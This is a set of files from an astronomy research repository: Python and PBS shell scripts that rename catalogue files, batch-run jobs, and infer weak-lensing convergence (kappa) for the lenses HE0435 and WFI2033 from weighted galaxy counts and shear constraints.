"/python/catalogue_utilities/rename.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# rename all folders given a rule\n\nimport os\n\n#rootin = '/lfs08/rusucs/WFI2033/MSwghtratios/'\n#rootout = '/lfs08/rusucs/WFI2033/MSwghtratios/'\n#init = [x for x in os.listdir(rootin) if ('.lst' in x) and ('sampled.lst' not in x) and ('count.lst' not in x) and ('meds' in x) and ('orig' not in x)]\n#init = [x for x in os.listdir(rootin) if ('arcsecinnermsk.cat' in x)]\n#for i in range(len(init)):\n# indiv = [x.strip() for x in init[i].split(\"_\")]\n# out = indiv[0]+'_'+indiv[1]+'_'+indiv[2]+'_'+indiv[3]+'_'+indiv[4]+'_'+indiv[5]+'_'+indiv[6]+'_'+indiv[7]+'_23_'+indiv[8]+'_5arcsecinner_gap_-1.0_-1.0.cat'\n# os.system('mv %s%s %s%s' %(rootin,init[i],rootout,out))\n\nrootin = '/lfs08/rusucs/0408/MSgals/'\nrootout = '/lfs08/rusucs/WFI2033/MSwghtratios/'\ninit = [x for x in os.listdir(rootin) if ('arcsecinnermsk.cat' in x)]\nfor i in range(len(init)):\n indiv = [x.strip() for x in init[i].split(\"_\")]\n out = indiv[0]+'_'+indiv[1]+'_'+indiv[2]+'_'+indiv[3]+'_'+indiv[4]+'_'+indiv[5]+'_'+indiv[6]+'_'+indiv[7]+'_23_'+indiv[8]+'_5arcsecinner_gap_-1.0_-1.0.cat'\n os.system('mv %s%s %s%s' %(rootin,init[i],rootout,out))\n\n#GGL_los_8_7_7_3_3_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_griz_0408.images_forNAOJ.txt\n" }, { "alpha_fraction": 0.6584440469741821, "alphanum_fraction": 0.766603410243988, "avg_line_length": 25.350000381469727, "blob_id": "b3962460571be50ed3bf6968c536754d790fcd62", "content_id": "8d4bd5539ef7f5a761e1f5c9b17af16f139a204a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 527, "license_type": "no_license", "max_line_length": 72, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim22.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log22s.out\n#PBS -e Log22s.err\n#PBS -N 22s\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappasimbias.py WFI2033 5 45 23 meds gal oneoverr mass2\npython inferkappasimbias.py WFI2033 5 120 23 meds gal oneoverr mass2\npython inferkappasimbiasphil.py WFI2033 5 45 23 meds gal oneoverr mass2\npython inferkappasimbiasphil.py WFI2033 5 120 23 meds gal oneoverr mass2\n" }, { "alpha_fraction": 0.5648470520973206, "alphanum_fraction": 0.6626016497612, "avg_line_length": 56.400001525878906, "blob_id": "2e8029d962bd24dd7c6ef3cdd4351894efd2b2c7", "content_id": "6e2c5a429e55225d21fd50e5fc3939805fb04129", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5166, "license_type": "no_license", "max_line_length": 971, "num_lines": 90, "path": "/python/plot_utilities/kappa_scaledstdchoice.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# uses the output of kappa_medsigsim.py to decide the based weight combination\n\nimport numpy as np\nfrom functools import reduce\n\nfile1 = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/kappasim/E2new5000_0/medstdbias_base120.dat\"\nfile2 = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/kappasim/E2new5000_1/medstdbias_base120.dat\"\nfile3 = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/kappasim/E2new5000_2/medstdbias_base120.dat\"\nfile4 = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/kappasim/E2new5000_0/medstdbias_base45.dat\"\nfile5 = 
\"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/kappasim/E2new5000_1/medstdbias_base45.dat\"\nfile6 = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/kappasim/E2new5000_2/medstdbias_base45.dat\"\n\nf1 = np.genfromtxt(file1,usecols=[0,3,4,5],dtype='S200,f,f,f')\nf2 = np.genfromtxt(file2,usecols=[0,3,4,5],dtype='S200,f,f,f')\nf3 = np.genfromtxt(file3,usecols=[0,3,4,5],dtype='S200,f,f,f')\nf4 = np.genfromtxt(file1,usecols=[0,3,4,5],dtype='S200,f,f,f')\nf5 = np.genfromtxt(file2,usecols=[0,3,4,5],dtype='S200,f,f,f')\nf6 = np.genfromtxt(file3,usecols=[0,3,4,5],dtype='S200,f,f,f')\nf1name = np.array([])\nf1los = np.array([])\nf1lines = np.array([])\nf1std = np.array([])\nf2name = np.array([])\nf2los = np.array([])\nf2lines = np.array([])\nf2std = np.array([])\nf3name = np.array([])\nf3los = np.array([])\nf3lines = np.array([])\nf3std = np.array([])\nf4name = np.array([])\nf4los = np.array([])\nf4lines = np.array([])\nf4std = np.array([])\nf5name = np.array([])\nf5los = np.array([])\nf5lines = np.array([])\nf5std = np.array([])\nf6name = np.array([])\nf6los = np.array([])\nf6lines = np.array([])\nf6std = np.array([])\nfor i in range(len(f1)):\n f1name = np.append(f1name,f1[i][0])\n f1los = np.append(f1los,f1[i][1])\n f1lines = np.append(f1lines,f1[i][2])\n f1std = np.append(f1std,f1[i][3])\nfor i in range(len(f2)):\n f2name = np.append(f2name,f2[i][0])\n f2los = np.append(f2los,f2[i][1])\n f2lines = np.append(f2lines,f2[i][2])\n f2std = np.append(f2std,f2[i][3])\nfor i in range(len(f3)):\n f3name = np.append(f3name,f3[i][0])\n f3los = np.append(f3los,f3[i][1])\n f3lines = np.append(f3lines,f3[i][2])\n f3std = np.append(f3std,f3[i][3])\nfor i in range(len(f4)):\n f4name = np.append(f4name,f4[i][0])\n f4los = np.append(f4los,f4[i][1])\n f4lines = np.append(f4lines,f4[i][2])\n f4std = np.append(f4std,f4[i][3])\nfor i in range(len(f5)):\n f5name = np.append(f5name,f5[i][0])\n f5los = np.append(f5los,f5[i][1])\n f5lines = np.append(f5lines,f5[i][2])\n f5std = np.append(f5std,f5[i][3])\nfor i in range(len(f6)):\n f6name = np.append(f6name,f6[i][0])\n f6los = np.append(f6los,f6[i][1])\n f6lines = np.append(f6lines,f6[i][2])\n f6std = np.append(f6std,f6[i][3])\n\nmatches = reduce(np.intersect1d, (f1name,f2name,f3name,f4name,f5name,f6name))\nmatches = np.sort(matches) # alphabetical sort\n\nout = np.zeros(21)\nfor i in range(len(matches)):\n med = np.around(np.mean([np.around(float(f1std[np.where(f1name == matches[i])][0]),3),np.around(float(f2std[np.where(f2name == matches[i])][0]),3),np.around(float(f3std[np.where(f3name == matches[i])][0]),3),np.around(float(f4std[np.where(f4name == matches[i])][0]),3),np.around(float(f5std[np.where(f5name == matches[i])][0]),3),np.around(float(f6std[np.where(f6name == matches[i])][0]),3)]),3)\n std = np.around(np.std([np.around(float(f1std[np.where(f1name == matches[i])][0]),3),np.around(float(f2std[np.where(f2name == matches[i])][0]),3),np.around(float(f3std[np.where(f3name == matches[i])][0]),3),np.around(float(f4std[np.where(f4name == matches[i])][0]),3),np.around(float(f5std[np.where(f5name == matches[i])][0]),3),np.around(float(f6std[np.where(f6name == matches[i])][0]),3)]),3)\n out_ = np.array([matches[i],int(f1los[np.where(f1name == matches[i])][0]),int(f2los[np.where(f2name == matches[i])][0]),int(f3los[np.where(f3name == matches[i])][0]),int(f4los[np.where(f4name == matches[i])][0]),int(f5los[np.where(f5name == matches[i])][0]),int(f6los[np.where(f6name == matches[i])][0]),int(f1lines[np.where(f1name == matches[i])][0]),int(f2lines[np.where(f2name == 
matches[i])][0]),int(f3lines[np.where(f3name == matches[i])][0]),int(f4lines[np.where(f4name == matches[i])][0]),int(f5lines[np.where(f5name == matches[i])][0]),int(f6lines[np.where(f6name == matches[i])][0]),np.around(float(f1std[np.where(f1name == matches[i])][0]),3),np.around(float(f2std[np.where(f2name == matches[i])][0]),3),np.around(float(f3std[np.where(f3name == matches[i])][0]),3),np.around(float(f4std[np.where(f4name == matches[i])][0]),3),np.around(float(f5std[np.where(f5name == matches[i])][0]),3),np.around(float(f6std[np.where(f6name == matches[i])][0]),3),med,std])\n out = np.c_[out,out_]\n\nfout = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/kappasim/scaledstdchoice.dat\"\nnp.savetxt(fout,out.T,fmt='%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s')\n\n# the RMS from inferkappasimbiasscript1.py and inferkappasimbiasscript2.py:\n#45: np.std([1.071,1.020,0.995,1.141,1.043,0.901,0.999,0.966,1.108,1.013,0.844,0.972,1.052,1.033,0.935]) = 0.074\n#120: np.std([1.168,0.992,1.069,1.008,0.955,0.955,1.071,0.932,1.031,0.977]) = 0.068\nrms2 = 2 * 0.045\n" }, { "alpha_fraction": 0.6029819250106812, "alphanum_fraction": 0.6631056666374207, "avg_line_length": 70.14068603515625, "blob_id": "a6b7be2f6c7587bebeddb76cd582f49d4c09e594", "content_id": "916f65bbaaec60deac30a08bedba73ba9cee2d86", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 51577, "license_type": "no_license", "max_line_length": 596, "num_lines": 725, "path": "/python/catalogue_utilities/inferkappa_unbiasedwithshear45and120FITSioHE0435_only3conjoinedorsingleshear_he0435unbias.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# CE Rusu Mar 9 2019\n# only use for HE0435\n# uses the old MS files from 2016, converted to FITS\n# Run as python /lfs08/rusucs/code/inferkappa_unbiasedwithshear45and120FITSioHE0435_only3conjoinedorsingleshear.py nohandpicked powerlawG1 5 24 45_gal 45_gamma 45_oneoverr\n# shear can be used as a single constraint\n\nimport sys\nimport os\nfrom os import system\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\nimport time\nimport fitsio # https://github.com/esheldon/fitsio\n\nstart_time=time.time()\nhandpickedstr = str(sys.argv[1])\nother = str(sys.argv[2]) # refers to an optional suffix for the shear constraint\ninnermask = str(sys.argv[3])\nmag = str(sys.argv[4])\nconjoined = len(sys.argv) - 5 # total number of arguments including code name, minus the number of ones that are not weights\n\nif innermask == \"5\": only8 = False\nif innermask == \"12\": only8 = True # in this case run only 8/64 MS fields\nunbias = True # if True, do not divide by N_LOS (currently, this only applies when a single constraint, the shear, is used)\n\nif conjoined == 1:\n weightin1 = str(sys.argv[5])\nif conjoined == 3:\n weightin1 = str(sys.argv[5])\n weightin2 = str(sys.argv[6])\n weightin3 = str(sys.argv[7])\n\nprint \"conjoined:\", conjoined\nlens = \"HE0435\"\nroot = \"/lfs08/rusucs/HE0435/MSwghtratios/\"\nrootcode = \"/lfs08/rusucs/code/\"\nrootout = \"/lfs08/rusucs/HE0435/MSkapparesults/\"\n#rootout = \"/Volumes/LaCieSubaru/kapparesults/\"\n#rootout = \"/mnt/scratch/rusucs/%s/MSkapparesults/\" % lens\nif innermask == '5': weightsfile = np.loadtxt(rootcode+'weightedcounts_%s_meds_%s_%sinner_%s.cat' %(lens,mag,innermask,handpickedstr),usecols=[1,2,3,4,5,6],unpack=True) # the file where I recorded the overdensities which I measured for the real lens\nif innermask == '12': weightsfile = 
np.loadtxt(rootcode+'weightedcounts_%s_meds_%s_%sinner_%s.cat' %(lens,mag,innermask,handpickedstr),usecols=[1,2,3],unpack=True)\nlimsigma = 2 # sigma limits on either side of the assumed gaussians\nbin_stat = 2000\nmin_kappa = -0.10\nmax_kappa = 1\n\nincrement1 = 2 # refers to the E interval from Greene et al. 2014\nincrement2 = 4\nincrement3 = 2\n\n# these quantities are only for dealing with galaxy groups\ndegree = np.pi / 180\nL_field = 4.0 * degree\nN_pix_per_dim = 4096\nL_pix = L_field / N_pix_per_dim\nrad = degree / 3600\n\n# define the shear constraints\n# OLD VALUES\n#if lens == \"HE0435\":\n# if other == 'fiducial' and innermask == '5':\n# constr_gamma = 0.030\n# constrwidth_gamma_inf = 0.027\n# constrwidth_gamma_sup = 0.033\n# if other == 'composite' and innermask == '5':\n# constr_gamma = 0.004\n# constrwidth_gamma_inf = 0.001\n# constrwidth_gamma_sup = 0.007\n# filters = \"ugriJHK\"\n# print 'shear: ',constr_gamma\n\nif lens == \"HE0435\":\n if other == 'powerlawG1' and innermask == '5':\n constr_gamma = 0.041\n constrwidth_gamma_inf = 0.023\n constrwidth_gamma_sup = 0.059\n if other == 'powerlaw5pert' and innermask == '12':\n constr_gamma = 0.056\n constrwidth_gamma_inf = 0.030\n constrwidth_gamma_sup = 0.082\n if other == 'compositeG1' and innermask == '5':\n constr_gamma = 0.026\n constrwidth_gamma_inf = 0.000\n constrwidth_gamma_sup = 0.052\n filters = \"ugriJHK\"\n print 'shear: ',constr_gamma\n\n# declare which weights to read\nmeasured_index45 = 0 # specifies the column index in weightsfile\nmeasured_index_inf45 = 1\nmeasured_index_sup45 = 2\nmeasured_index120 = 3\nmeasured_index_inf120 = 4\nmeasured_index_sup120 = 5\n\nif mag == \"24\":\n def declareweight(weightin):\n if weightin.split('_')[1] == \"gal\": weight_index = 4\n if weightin.split('_')[1] == \"z\": weight_index = 6\n if weightin.split('_')[1] == \"mass\": weight_index = 8\n if weightin.split('_')[1] == \"mass2\": weight_index = 10\n if weightin.split('_')[1] == \"mass3\": weight_index = 12\n if weightin.split('_')[1] == \"oneoverr\": weight_index = 14\n if weightin.split('_')[1] == \"zoverr\": weight_index = 16\n if weightin.split('_')[1] == \"massoverr\": weight_index = 18\n if weightin.split('_')[1] == \"mass2overr\": weight_index = 20\n if weightin.split('_')[1] == \"mass3overr\": weight_index = 22\n if weightin.split('_')[1] == \"mass2rms\": weight_index = 24\n if weightin.split('_')[1] == \"mass3rms\": weight_index = 26\n if weightin.split('_')[1] == \"mass2overrrms\": weight_index = 28\n if weightin.split('_')[1] == \"mass3overrrms\": weight_index = 30\n if weightin.split('_')[1] == \"flexion\": weight_index = 32\n if weightin.split('_')[1] == \"tidal\": weight_index = 34\n if weightin.split('_')[1] == \"SIS\": weight_index = 36\n if weightin.split('_')[1] == \"SIShalo\": weight_index = 38\n if weightin.split('_')[1] == \"gamma\": weight_index = None\n return weight_index\nif mag == \"23\":\n def declareweight(weightin):\n if weightin.split('_')[1] == \"gal\": weight_index = 5\n if weightin.split('_')[1] == \"z\": weight_index = 7\n if weightin.split('_')[1] == \"mass\": weight_index = 9\n if weightin.split('_')[1] == \"mass2\": weight_index = 11\n if weightin.split('_')[1] == \"mass3\": weight_index = 13\n if weightin.split('_')[1] == \"oneoverr\": weight_index = 15\n if weightin.split('_')[1] == \"zoverr\": weight_index = 17\n if weightin.split('_')[1] == \"massoverr\": weight_index = 19\n if weightin.split('_')[1] == \"mass2overr\": weight_index = 21\n if weightin.split('_')[1] == \"mass3overr\": 
weight_index = 23\n if weightin.split('_')[1] == \"mass2rms\": weight_index = 25\n if weightin.split('_')[1] == \"mass3rms\": weight_index = 27\n if weightin.split('_')[1] == \"mass2overrrms\": weight_index = 29\n if weightin.split('_')[1] == \"mass3overrrms\": weight_index = 31\n if weightin.split('_')[1] == \"flexion\": weight_index = 33\n if weightin.split('_')[1] == \"tidal\": weight_index = 35\n if weightin.split('_')[1] == \"SIS\": weight_index = 37\n if weightin.split('_')[1] == \"SIShalo\": weight_index = 39\n if weightin.split('_')[1] == \"gamma\": weight_index = None\n return weight_index\n\nweight1_index = declareweight(weightin1)\nif conjoined >= 2:\n weight2_index = declareweight(weightin2)\n if conjoined >= 3:\n weight3_index = declareweight(weightin3)\n\n# read weight constraints\nconstr_gal_meds45 = weightsfile[measured_index45][0]\nconstrwidth_gal_meds_inf45 = weightsfile[measured_index_inf45][0]\nconstrwidth_gal_meds_sup45 = weightsfile[measured_index_sup45][0]\n\nconstr_z_meds45 = weightsfile[measured_index45][1]\nconstrwidth_z_meds_inf45 = weightsfile[measured_index_inf45][1]\nconstrwidth_z_meds_sup45 = weightsfile[measured_index_sup45][1]\n\nconstr_mass_meds45 = weightsfile[measured_index45][2]\nconstrwidth_mass_meds_inf45 = weightsfile[measured_index_inf45][2]\nconstrwidth_mass_meds_sup45 = weightsfile[measured_index_sup45][2]\n\nconstr_mass2_meds45 = weightsfile[measured_index45][3]\nconstrwidth_mass2_meds_inf45 = weightsfile[measured_index_inf45][3]\nconstrwidth_mass2_meds_sup45 = weightsfile[measured_index_sup45][3]\n\nconstr_mass3_meds45 = weightsfile[measured_index45][4]\nconstrwidth_mass3_meds_inf45 = weightsfile[measured_index_inf45][4]\nconstrwidth_mass3_meds_sup45 = weightsfile[measured_index_sup45][4]\n\nconstr_oneoverr_meds45 = weightsfile[measured_index45][5]\nconstrwidth_oneoverr_meds_inf45 = weightsfile[measured_index_inf45][5]\nconstrwidth_oneoverr_meds_sup45 = weightsfile[measured_index_sup45][5]\n\nconstr_zoverr_meds45 = weightsfile[measured_index45][6]\nconstrwidth_zoverr_meds_inf45 = weightsfile[measured_index_inf45][6]\nconstrwidth_zoverr_meds_sup45 = weightsfile[measured_index_sup45][6]\n\nconstr_massoverr_meds45 = weightsfile[measured_index45][7]\nconstrwidth_massoverr_meds_inf45 = weightsfile[measured_index_inf45][7]\nconstrwidth_massoverr_meds_sup45 = weightsfile[measured_index_sup45][7]\n\nconstr_mass2overr_meds45 = weightsfile[measured_index45][8]\nconstrwidth_mass2overr_meds_inf45 = weightsfile[measured_index_inf45][8]\nconstrwidth_mass2overr_meds_sup45 = weightsfile[measured_index_sup45][8]\n\nconstr_mass3overr_meds45 = weightsfile[measured_index45][9]\nconstrwidth_mass3overr_meds_inf45 = weightsfile[measured_index_inf45][9]\nconstrwidth_mass3overr_meds_sup45 = weightsfile[measured_index_sup45][9]\n\nconstr_mass2rms_meds45 = weightsfile[measured_index45][10]\nconstrwidth_mass2rms_meds_inf45 = weightsfile[measured_index_inf45][10]\nconstrwidth_mass2rms_meds_sup45 = weightsfile[measured_index_sup45][10]\n\nconstr_mass3rms_meds45 = weightsfile[measured_index45][11]\nconstrwidth_mass3rms_meds_inf45 = weightsfile[measured_index_inf45][11]\nconstrwidth_mass3rms_meds_sup45 = weightsfile[measured_index_sup45][11]\n\nconstr_mass2overrrms_meds45 = weightsfile[measured_index45][12]\nconstrwidth_mass2overrrms_meds_inf45 = weightsfile[measured_index_inf45][12]\nconstrwidth_mass2overrrms_meds_sup45 = weightsfile[measured_index_sup45][12]\n\nconstr_mass3overrrms_meds45 = weightsfile[measured_index45][13]\nconstrwidth_mass3overrrms_meds_inf45 = 
weightsfile[measured_index_inf45][13]\nconstrwidth_mass3overrrms_meds_sup45 = weightsfile[measured_index_sup45][13]\n\nconstr_flexion_meds45 = weightsfile[measured_index45][14]\nconstrwidth_flexion_meds_inf45 = weightsfile[measured_index_inf45][14]\nconstrwidth_flexion_meds_sup45 = weightsfile[measured_index_sup45][14]\n\nconstr_tidal_meds45 = weightsfile[measured_index45][15]\nconstrwidth_tidal_meds_inf45 = weightsfile[measured_index_inf45][15]\nconstrwidth_tidal_meds_sup45 = weightsfile[measured_index_sup45][15]\n\nconstr_SIS_meds45 = weightsfile[measured_index45][16]\nconstrwidth_SIS_meds_inf45 = weightsfile[measured_index_inf45][16]\nconstrwidth_SIS_meds_sup45 = weightsfile[measured_index_sup45][16]\n\nconstr_SIShalo_meds45 = weightsfile[measured_index45][17]\nconstrwidth_SIShalo_meds_inf45 = weightsfile[measured_index_inf45][17]\nconstrwidth_SIShalo_meds_sup45 = weightsfile[measured_index_sup45][17]\n\nif innermask == \"5\":\n constr_gal_meds120 = weightsfile[measured_index120][0]\n constrwidth_gal_meds_inf120 = weightsfile[measured_index_inf120][0]\n constrwidth_gal_meds_sup120 = weightsfile[measured_index_sup120][0]\n\n constr_z_meds120 = weightsfile[measured_index120][1]\n constrwidth_z_meds_inf120 = weightsfile[measured_index_inf120][1]\n constrwidth_z_meds_sup120 = weightsfile[measured_index_sup120][1]\n\n constr_mass_meds120 = weightsfile[measured_index120][2]\n constrwidth_mass_meds_inf120 = weightsfile[measured_index_inf120][2]\n constrwidth_mass_meds_sup120 = weightsfile[measured_index_sup120][2]\n\n constr_mass2_meds120 = weightsfile[measured_index120][3]\n constrwidth_mass2_meds_inf120 = weightsfile[measured_index_inf120][3]\n constrwidth_mass2_meds_sup120 = weightsfile[measured_index_sup120][3]\n\n constr_mass3_meds120 = weightsfile[measured_index120][4]\n constrwidth_mass3_meds_inf120 = weightsfile[measured_index_inf120][4]\n constrwidth_mass3_meds_sup120 = weightsfile[measured_index_sup120][4]\n\n constr_oneoverr_meds120 = weightsfile[measured_index120][5]\n constrwidth_oneoverr_meds_inf120 = weightsfile[measured_index_inf120][5]\n constrwidth_oneoverr_meds_sup120 = weightsfile[measured_index_sup120][5]\n\n constr_zoverr_meds120 = weightsfile[measured_index120][6]\n constrwidth_zoverr_meds_inf120 = weightsfile[measured_index_inf120][6]\n constrwidth_zoverr_meds_sup120 = weightsfile[measured_index_sup120][6]\n\n constr_massoverr_meds120 = weightsfile[measured_index120][7]\n constrwidth_massoverr_meds_inf120 = weightsfile[measured_index_inf120][7]\n constrwidth_massoverr_meds_sup120 = weightsfile[measured_index_sup120][7]\n\n constr_mass2overr_meds120 = weightsfile[measured_index120][8]\n constrwidth_mass2overr_meds_inf120 = weightsfile[measured_index_inf120][8]\n constrwidth_mass2overr_meds_sup120 = weightsfile[measured_index_sup120][8]\n\n constr_mass3overr_meds120 = weightsfile[measured_index120][9]\n constrwidth_mass3overr_meds_inf120 = weightsfile[measured_index_inf120][9]\n constrwidth_mass3overr_meds_sup120 = weightsfile[measured_index_sup120][9]\n\n constr_mass2rms_meds120 = weightsfile[measured_index120][10]\n constrwidth_mass2rms_meds_inf120 = weightsfile[measured_index_inf120][10]\n constrwidth_mass2rms_meds_sup120 = weightsfile[measured_index_sup120][10]\n\n constr_mass3rms_meds120 = weightsfile[measured_index120][11]\n constrwidth_mass3rms_meds_inf120 = weightsfile[measured_index_inf120][11]\n constrwidth_mass3rms_meds_sup120 = weightsfile[measured_index_sup120][11]\n\n constr_mass2overrrms_meds120 = weightsfile[measured_index120][12]\n 
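# A minimal sketch of the assumed layout of the weightedcounts_*.cat file read above (inferred from usecols=[1,2,3,4,5,6] in the innermask='5' case; illustrative, not authoritative): one row per weight type, in the row order used throughout this block (row 0 = gal, row 1 = z, ..., row 17 = SIShalo), with the six loaded columns holding the 45 arcsec median and its lower/upper widths, then the 120 arcsec median and widths.\n    # e.g. a gal row might read: gal 1.20 1.10 1.30 1.05 0.95 1.15 (hypothetical numbers)\n    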
constrwidth_mass2overrrms_meds_inf120 = weightsfile[measured_index_inf120][12]\n constrwidth_mass2overrrms_meds_sup120 = weightsfile[measured_index_sup120][12]\n\n constr_mass3overrrms_meds120 = weightsfile[measured_index120][13]\n constrwidth_mass3overrrms_meds_inf120 = weightsfile[measured_index_inf120][13]\n constrwidth_mass3overrrms_meds_sup120 = weightsfile[measured_index_sup120][13]\n\n constr_flexion_meds120 = weightsfile[measured_index120][14]\n constrwidth_flexion_meds_inf120 = weightsfile[measured_index_inf120][14]\n constrwidth_flexion_meds_sup120 = weightsfile[measured_index_sup120][14]\n\n constr_tidal_meds120 = weightsfile[measured_index120][15]\n constrwidth_tidal_meds_inf120 = weightsfile[measured_index_inf120][15]\n constrwidth_tidal_meds_sup120 = weightsfile[measured_index_sup120][15]\n\n constr_SIS_meds120 = weightsfile[measured_index120][16]\n constrwidth_SIS_meds_inf120 = weightsfile[measured_index_inf120][16]\n constrwidth_SIS_meds_sup120 = weightsfile[measured_index_sup120][16]\n\n constr_SIShalo_meds120 = weightsfile[measured_index120][17]\n constrwidth_SIShalo_meds_inf120 = weightsfile[measured_index_inf120][17]\n constrwidth_SIShalo_meds_sup120 = weightsfile[measured_index_sup120][17]\n\ndef declareweight(weightin):\n if weightin.split('_')[0] == \"45\":\n if weightin.split('_')[1] == \"gal\": constr_weight = constr_gal_meds45; constrwidth_weight_inf = constrwidth_gal_meds_inf45; constrwidth_weight_sup = constrwidth_gal_meds_sup45\n if weightin.split('_')[1] == \"z\": constr_weight = constr_z_meds45; constrwidth_weight_inf = constrwidth_z_meds_inf45; constrwidth_weight_sup = constrwidth_z_meds_sup45\n if weightin.split('_')[1] == \"mass\": constr_weight = constr_mass_meds45; constrwidth_weight_inf = constrwidth_mass_meds_inf45; constrwidth_weight_sup = constrwidth_mass_meds_sup45\n if weightin.split('_')[1] == \"mass2\": constr_weight = constr_mass2_meds45; constrwidth_weight_inf = constrwidth_mass2_meds_inf45; constrwidth_weight_sup = constrwidth_mass2_meds_sup45\n if weightin.split('_')[1] == \"mass3\": constr_weight = constr_mass3_meds45; constrwidth_weight_inf = constrwidth_mass3_meds_inf45; constrwidth_weight_sup = constrwidth_mass3_meds_sup45\n if weightin.split('_')[1] == \"oneoverr\": constr_weight = constr_oneoverr_meds45; constrwidth_weight_inf = constrwidth_oneoverr_meds_inf45; constrwidth_weight_sup = constrwidth_oneoverr_meds_sup45\n if weightin.split('_')[1] == \"zoverr\": constr_weight = constr_zoverr_meds45; constrwidth_weight_inf = constrwidth_zoverr_meds_inf45; constrwidth_weight_sup = constrwidth_zoverr_meds_sup45\n if weightin.split('_')[1] == \"massoverr\": constr_weight = constr_massoverr_meds45; constrwidth_weight_inf = constrwidth_massoverr_meds_inf45; constrwidth_weight_sup = constrwidth_massoverr_meds_sup45\n if weightin.split('_')[1] == \"mass2overr\": constr_weight = constr_mass2overr_meds45; constrwidth_weight_inf = constrwidth_mass2overr_meds_inf45; constrwidth_weight_sup = constrwidth_mass2overr_meds_sup45\n if weightin.split('_')[1] == \"mass3overr\": constr_weight = constr_mass3overr_meds45; constrwidth_weight_inf = constrwidth_mass3overr_meds_inf45; constrwidth_weight_sup = constrwidth_mass3overr_meds_sup45\n if weightin.split('_')[1] == \"mass2rms\": constr_weight = constr_mass2rms_meds45; constrwidth_weight_inf = constrwidth_mass2rms_meds_inf45; constrwidth_weight_sup = constrwidth_mass2rms_meds_sup45\n if weightin.split('_')[1] == \"mass3rms\": constr_weight = constr_mass3rms_meds45; constrwidth_weight_inf = 
constrwidth_mass3rms_meds_inf45; constrwidth_weight_sup = constrwidth_mass3rms_meds_sup45\n if weightin.split('_')[1] == \"mass2overrrms\": constr_weight = constr_mass2overrrms_meds45; constrwidth_weight_inf = constrwidth_mass2overrrms_meds_inf45; constrwidth_weight_sup = constrwidth_mass2overrrms_meds_sup45\n if weightin.split('_')[1] == \"mass3overrrms\": constr_weight = constr_mass3overrrms_meds45; constrwidth_weight_inf = constrwidth_mass3overrrms_meds_inf45; constrwidth_weight_sup = constrwidth_mass3overrrms_meds_sup45\n if weightin.split('_')[1] == \"flexion\": constr_weight = constr_flexion_meds45; constrwidth_weight_inf = constrwidth_flexion_meds_inf45; constrwidth_weight_sup = constrwidth_flexion_meds_sup45\n if weightin.split('_')[1] == \"tidal\": constr_weight = constr_tidal_meds45; constrwidth_weight_inf = constrwidth_tidal_meds_inf45; constrwidth_weight_sup = constrwidth_tidal_meds_sup45\n if weightin.split('_')[1] == \"SIS\": constr_weight = constr_SIS_meds45; constrwidth_weight_inf = constrwidth_SIS_meds_inf45; constrwidth_weight_sup = constrwidth_SIS_meds_sup45\n if weightin.split('_')[1] == \"SIShalo\": constr_weight = constr_SIShalo_meds45; constrwidth_weight_inf = constrwidth_SIShalo_meds_inf45; constrwidth_weight_sup = constrwidth_SIShalo_meds_sup45\n if weightin.split('_')[0] == \"120\":\n if weightin.split('_')[1] == \"gal\": constr_weight = constr_gal_meds120; constrwidth_weight_inf = constrwidth_gal_meds_inf120; constrwidth_weight_sup = constrwidth_gal_meds_sup120\n if weightin.split('_')[1] == \"z\": constr_weight = constr_z_meds120; constrwidth_weight_inf = constrwidth_z_meds_inf120; constrwidth_weight_sup = constrwidth_z_meds_sup120\n if weightin.split('_')[1] == \"mass\": constr_weight = constr_mass_meds120; constrwidth_weight_inf = constrwidth_mass_meds_inf120; constrwidth_weight_sup = constrwidth_mass_meds_sup120\n if weightin.split('_')[1] == \"mass2\": constr_weight = constr_mass2_meds120; constrwidth_weight_inf = constrwidth_mass2_meds_inf120; constrwidth_weight_sup = constrwidth_mass2_meds_sup120\n if weightin.split('_')[1] == \"mass3\": constr_weight = constr_mass3_meds120; constrwidth_weight_inf = constrwidth_mass3_meds_inf120; constrwidth_weight_sup = constrwidth_mass3_meds_sup120\n if weightin.split('_')[1] == \"oneoverr\": constr_weight = constr_oneoverr_meds120; constrwidth_weight_inf = constrwidth_oneoverr_meds_inf120; constrwidth_weight_sup = constrwidth_oneoverr_meds_sup120\n if weightin.split('_')[1] == \"zoverr\": constr_weight = constr_zoverr_meds120; constrwidth_weight_inf = constrwidth_zoverr_meds_inf120; constrwidth_weight_sup = constrwidth_zoverr_meds_sup120\n if weightin.split('_')[1] == \"massoverr\": constr_weight = constr_massoverr_meds120; constrwidth_weight_inf = constrwidth_massoverr_meds_inf120; constrwidth_weight_sup = constrwidth_massoverr_meds_sup120\n if weightin.split('_')[1] == \"mass2overr\": constr_weight = constr_mass2overr_meds120; constrwidth_weight_inf = constrwidth_mass2overr_meds_inf120; constrwidth_weight_sup = constrwidth_mass2overr_meds_sup120\n if weightin.split('_')[1] == \"mass3overr\": constr_weight = constr_mass3overr_meds120; constrwidth_weight_inf = constrwidth_mass3overr_meds_inf120; constrwidth_weight_sup = constrwidth_mass3overr_meds_sup120\n if weightin.split('_')[1] == \"mass2rms\": constr_weight = constr_mass2rms_meds120; constrwidth_weight_inf = constrwidth_mass2rms_meds_inf120; 